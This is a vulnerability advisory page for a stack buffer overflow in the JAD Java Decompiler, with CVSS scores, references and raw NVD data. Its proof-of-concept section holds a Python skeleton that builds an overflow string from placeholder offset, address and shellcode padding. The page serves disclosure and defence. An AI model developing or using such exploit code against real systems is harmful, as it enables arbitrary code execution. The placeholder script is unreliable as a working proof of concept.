CVE-2017-20227

Description

JAD Java Decompiler 1.5.8e-1kali1 and prior contains a stack-based buffer overflow vulnerability that allows attackers to execute arbitrary code by supplying overly long input that exceeds buffer boundaries. Attackers can craft malicious input passed to the jad command to overflow the stack and execute a return-oriented programming chain that spawns a shell.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:varaneckas:jad_java_decompiler:1.5.8e-1kali1:*:*:*:*:*:*:* - VULNERABLE

JAD Java Decompiler <= 1.5.8e-1kali1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python
# PoC for CVE-2017-20227 (JAD Stack Buffer Overflow)
# This script generates a malicious file to trigger the overflow.

import struct

# Offset to overwrite EIP (Example value, adjust based on specific binary analysis)
offset = 412

# ROP chain to spawn shell (Example placeholders)
rop_chain = "A" * offset
rop_chain += struct.pack('<I', 0xdeadbeef) # Overwrite EIP with gadget address
rop_chain += "C" * 100  # Padding / Shellcode placeholder

# Create a malicious .class file with a long name or pass argument
# Assuming the crash happens via command line argument
payload = rop_chain

print("[+] Generating payload...")
print("[+] Payload length: {}".format(len(payload)))

# Command to simulate crash (requires vulnerable jad binary)
# print("Usage: jad " + payload)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2017-20227
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2017-20227
[3] CVE Details https://www.cvedetails.com/cve/CVE-2017-20227/
[4] VulDB https://vuldb.com/cve/CVE-2017-20227
[5] http://www.varaneckas.com/jad/
[6] https://www.exploit-db.com/exploits/42255
[7] https://www.vulncheck.com/advisories/jad-8e-1kali1-stack-based-buffer-overflow

Raw JSON Data

JSON

{"cve": {"id": "CVE-2017-20227", "sourceIdentifier": "[email protected]", "published": "2026-03-28T12:16:01.993", "lastModified": "2026-04-08T19:37:26.690", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "JAD Java Decompiler 1.5.8e-1kali1 and prior contains a stack-based buffer overflow vulnerability that allows attackers to execute arbitrary code by supplying overly long input that exceeds buffer boundaries. Attackers can craft malicious input passed to the jad command to overflow the stack and execute a return-oriented programming chain that spawns a shell."}, {"lang": "es", "value": "JAD Java Decompiler 1.5.8e-1kali1 y versiones anteriores contiene una vulnerabilidad de desbordamiento de búfer basado en pila que permite a los atacantes ejecutar código arbitrario al proporcionar una entrada excesivamente larga que excede los límites del búfer. Los atacantes pueden crear una entrada maliciosa pasada al comando jad para desbordar la pila y ejecutar una cadena de programación orientada a retorno que genera un shell."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:varaneckas:jad_java_decompiler:1.5.8e-1kali1:*:*:*:*:*:*:*", "matchCriteriaId": "2E369DAD-6CD8-49AE-83F2-0CED1FEE51E1"}]}]}], "references": [{"url": "http://www.varaneckas.com/jad/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/42255", "source": "[email protected]", "tags": ["Exploit", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/jad-8e-1kali1-stack-based-buffer-overflow", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}